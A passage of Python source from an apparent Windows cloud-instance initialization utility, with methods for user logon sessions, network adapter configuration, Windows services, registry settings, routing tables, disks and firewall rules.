raise exception.CloudbaseInitException('Invalid user')
elif ret_val != 0:
raise exception.CloudbaseInitException('Unknown error')
def get_user_sid(self, username):
try:
user_info = self._get_user_info(username, 4)
return str(user_info["user_sid"])[6:]
except exception.ItemNotFoundException:
# User not found
pass
def create_user_logon_session(self, username, password, domain='.',
load_profile=True,
logon_type=LOGON32_LOGON_INTERACTIVE):
LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
{"username": username, "domain": domain})
token = wintypes.HANDLE()
ret_val = advapi32.LogonUserW(six.text_type(username),
six.text_type(domain),
six.text_type(password),
logon_type,
self.LOGON32_PROVIDER_DEFAULT,
ctypes.byref(token))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"User logon failed: %r")
if load_profile:
pi = Win32_PROFILEINFO()
pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
pi.lpUserName = six.text_type(username)
ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
if not ret_val:
kernel32.CloseHandle(token)
raise exception.WindowsCloudbaseInitException(
"Cannot load user profile: %r")
return token
def get_current_user(self):
"""Get the user account name from the underlying instance."""
buf_len = wintypes.ULONG(512)
buf = ctypes.create_unicode_buffer(512)
ret_val = secur32.GetUserNameExW(
self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
buf, ctypes.byref(buf_len))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"GetUserNameExW failed: %r")
return buf.value.split("\\")
def execute_process_as_user(self, token, args, wait=True,
new_console=False):
"""Executes processes as an user.
:param token: Represents the user logon session token, resulted from
running the 'create_user_logon_session' method.
:param args: The arguments with which the process will be run with.
:param wait: Specifies if it's needed to wait for the process
handler to finish up running all the operations
on the process object.
:param new_console: Specifies whether the process should run
under a new console or not.
:return: The exit code value resulted from the running process.
:rtype: int
"""
LOG.debug("Executing process as user, command line: %s", args)
proc_info = Win32_PROCESS_INFORMATION()
startup_info = Win32_STARTUPINFO_W()
startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
startup_info.lpDesktop = ""
flags = self.CREATE_NEW_CONSOLE if new_console else 0
cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
try:
ret_val = advapi32.CreateProcessAsUserW(
token, None, cmdline, None, None, False, flags, None, None,
ctypes.byref(startup_info), ctypes.byref(proc_info))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"CreateProcessAsUserW failed: %r")
if wait and proc_info.hProcess:
kernel32.WaitForSingleObject(
proc_info.hProcess, self.INFINITE)
exit_code = wintypes.DWORD()
if not kernel32.GetExitCodeProcess(
proc_info.hProcess, ctypes.byref(exit_code)):
raise exception.WindowsCloudbaseInitException(
"GetExitCodeProcess failed: %r")
return exit_code.value
finally:
if proc_info.hProcess:
kernel32.CloseHandle(proc_info.hProcess)
if proc_info.hThread:
kernel32.CloseHandle(proc_info.hThread)
def close_user_logon_session(self, token):
kernel32.CloseHandle(token)
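# Hedged usage sketch (illustrative only; the account, password and
# command below are hypothetical):
#   utils = WindowsUtils()
#   token = utils.create_user_logon_session('Admin', 'Passw0rd!')
#   try:
#       exit_code = utils.execute_process_as_user(token, ['whoami.exe'])
#   finally:
#       utils.close_user_logon_session(token)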
def get_user_home(self, username):
user_sid = self.get_user_sid(username)
if user_sid:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\Windows NT\\CurrentVersion\\'
'ProfileList\\%s' % user_sid) as key:
return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
LOG.debug('Home directory not found for user %r', username)
return None
def sanitize_shell_input(self, value):
return value.replace('"', '\\"')
def set_host_name(self, new_host_name):
ret_val = kernel32.SetComputerNameExW(
self.ComputerNamePhysicalDnsHostname,
six.text_type(new_host_name))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot set host name: %r")
return True
def get_network_adapters(self):
"""Return available adapters as a list of tuples of (name, mac)."""
conn = wmi.WMI(moniker='//./root/cimv2')
# Get Ethernet adapters only
wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
if self.check_os_version(6, 0):
wql += ' AND PhysicalAdapter = True'
q = conn.query(wql)
return [(r.NetConnectionID, r.MACAddress) for r in q]
def get_dhcp_hosts_in_use(self):
dhcp_hosts = []
for net_addr in network.get_adapter_addresses():
if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
dhcp_hosts.append((net_addr["friendly_name"],
net_addr["mac_address"],
net_addr["dhcp_server"]))
return dhcp_hosts
def set_ntp_client_config(self, ntp_hosts):
base_dir = self._get_system_dir()
w32tm_path = os.path.join(base_dir, "w32tm.exe")
# Convert the NTP hosts list to a string, in order to pass
# it to w32tm.
ntp_hosts = ",".join(ntp_hosts)
args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
'/syncfromflags:manual', '/update']
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
@retry_decorator.retry_decorator(
max_retry_count=30, exceptions=exception.ItemNotFoundException)
def get_network_adapter_name_by_mac_address(self, mac_address):
iface_index_list = [
net_addr for net_addr
in network.get_adapter_addresses()
if net_addr["mac_address"] is not None and
net_addr["mac_address"].lower() == mac_address.lower()]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with MAC address "%s" not found' %
mac_address)
if len(iface_index_list) > 1:
raise exception.CloudbaseInitException(
'Multiple network interfaces with MAC address "%s" exist' %
mac_address)
return iface_index_list[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
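# Hedged worked example (interface name and addresses are hypothetical):
#   set_static_network_config('Ethernet0', '10.0.0.2', 24, '10.0.0.1', [])
# and
#   set_static_network_config('Ethernet0', '10.0.0.2', '255.255.255.0',
#                             '10.0.0.1', [])
# are equivalent, because netaddr.IPNetwork normalises both the prefix
# length and the dotted netmask form to prefixlen 24.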
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
key_name = self._get_config_key_name(section)
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
if type(value) == int:
regtype = winreg.REG_DWORD
else:
regtype = winreg.REG_SZ
winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
key_name = self._get_config_key_name(section)
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
(value, regtype) = winreg.QueryValueEx(key, name)
return value
except WindowsError:
return None
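# Hedged usage sketch: values live under the registry key
# HKLM\SOFTWARE\Cloudbase Solutions\Cloudbase-Init\<section>; the section
# and value names below are hypothetical.
#   utils.set_config_value('LastStatus', 1, section='Plugins')
#   utils.get_config_value('LastStatus', section='Plugins')  # -> 1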
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
metric):
args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
(out, err, ret_val) = self.execute_process(args)
# Cannot use the return value to determine the outcome
if ret_val or err:
raise exception.CloudbaseInitException(
'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
if length < 3:
raise exception.CloudbaseInitException(
"Password can not have less than 3 characters!")
while True:
pwd = super(WindowsUtils, self).generate_random_password(length)
# Make sure that the Windows complexity requirements are met:
# http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx
valid = True
for r in ["[a-z]", "[A-Z]", "[0-9]"]:
if not re.search(r, pwd):
valid = False
if valid:
return pwd
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
"""Return Windows system directory with compatibility support.
Depending on the interpreter bits and platform architecture,
the return value may vary between
C:\Windows\(System32|SysWOW64|Sysnative).
Note that "Sysnative" is just an alias (doesn't really exist on disk).
More info about this can be found in documentation.
"""
